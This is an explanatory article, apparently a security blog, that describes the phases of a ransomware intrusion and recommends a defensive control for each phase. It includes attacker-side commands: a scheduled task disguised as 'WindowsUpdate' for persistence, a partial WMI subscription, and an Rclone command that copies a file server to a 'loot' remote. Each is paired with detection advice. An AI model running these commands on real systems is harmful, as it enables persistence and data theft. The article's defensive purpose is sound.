Ransomware has evolved from a nuisance that encrypted files on individual machines into a sophisticated criminal enterprise that follows a defined operational playbook. Ransomware-as-a-Service (RaaS) groups now operate with specialised teams: initial access brokers who sell footholds, pen testers who perform network compromise, and separate teams for data exfiltration and ransom negotiation. Understanding this structure tells you which controls disrupt the operation at each phase.
Phase 1: Initial Access
Initial access is almost always obtained via one of three routes: phishing emails delivering credential stealers or remote access trojans (accounting for around 40% of ransomware intrusions), exploitation of externally exposed services (VPN appliances, RDP, Exchange vulnerabilities), or initial access brokers selling pre-established footholds acquired via prior stealer malware infections.
| Access Method | Frequency | Top Defensive Control |
|---|---|---|
| Phishing | ~40% | Email filtering + phishing-resistant MFA |
| Exposed RDP/VPN | ~30% | Patch cadence + conditional access |
| IAB purchase | ~20% | Credential monitoring + EDR |
| Supply chain | ~10% | Software composition analysis + vendor MFA |
Phase 2: Post-Exploitation and Persistence
After gaining initial access, operators establish persistence and begin internal reconnaissance. Common persistence mechanisms include scheduled tasks, registry run keys, and WMI event subscriptions on Windows; cron jobs and modified boot scripts on Linux. The goal is to survive reboots and initial EDR detections.
# Common persistence mechanism: scheduled task (highly detectable if EDR is configured)
schtasks /create /tn "WindowsUpdate" /tr "C:\ProgramData\update.exe" /sc onlogon /ru system /f
# Less common but harder to detect: WMI event subscription
$FilterName = "WindowsUpdateFilter"
$ConsumerName = "WindowsUpdateConsumer"
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 3"
# Detection: query WMI subscriptions
Get-WMIObject -Namespace root/subscription -Class __EventFilter
Get-WMIObject -Namespace root/subscription -Class __EventConsumerPhase 3: Lateral Movement and Domain Compromise
Modern ransomware groups do not immediately encrypt. They spend time — often days or weeks — establishing domain-level access to maximise the blast radius of the final encryption event. Techniques mirror those used by nation-state actors: Kerberoasting, DCSync, Pass-the-Hash, and living-off-the-land with legitimate administrative tools (PsExec, WMI, PowerShell remoting).
Phase 4: Data Exfiltration (Double Extortion)
Since approximately 2020, most sophisticated ransomware groups exfiltrate data before encrypting it. This 'double extortion' tactic means that even organisations with working backups face the threat of data publication if they do not pay. Exfiltration typically uses legitimate cloud storage services (Mega, Rclone with cloud backends, StorjDCS) to blend with normal traffic.
# Attacker-side exfil using Rclone (blend with legitimate cloud sync traffic)
# This is documented for detection purposes
rclone copy /mnt/fileserver remote:loot --transfers 10 --ignore-errors
# Detection: monitor for Rclone or unusual outbound data volumes
# Windows Event Log - network connections from rclone.exe
# DLP rules: bulk access to file shares followed by outbound data transfer
# NetFlow analysis: sustained high-volume transfers to cloud storage endpointsPhase 5: Encryption and Ransom Demand
The encryption event is typically triggered on a schedule or by remote command after all preparation is complete. Modern encryptors use hybrid encryption (asymmetric for key transport, symmetric for bulk data), target network shares and backup infrastructure, and attempt to delete Volume Shadow Copies to prevent easy recovery.
Where to Invest Defensively
- --Phishing-resistant MFA is the single highest-return investment. It blocks the most common initial access route.
- --Patch externally exposed services within 72 hours of critical vulnerability disclosure. This is where initial access brokers find their inventory.
- --EDR on every endpoint with memory protection enabled. The period between initial access and lateral movement is where most detection happens.
- --Network segmentation between user workstations and servers. Lateral movement requires traversal of this boundary.
- --Offline, immutable backups for all critical data. Test restores quarterly. The encryptor cannot reach what it cannot touch.
- --Credential monitoring: subscribe to haveibeenpwned Enterprise or similar to know when your credentials appear in stealer logs before the threat actor uses them.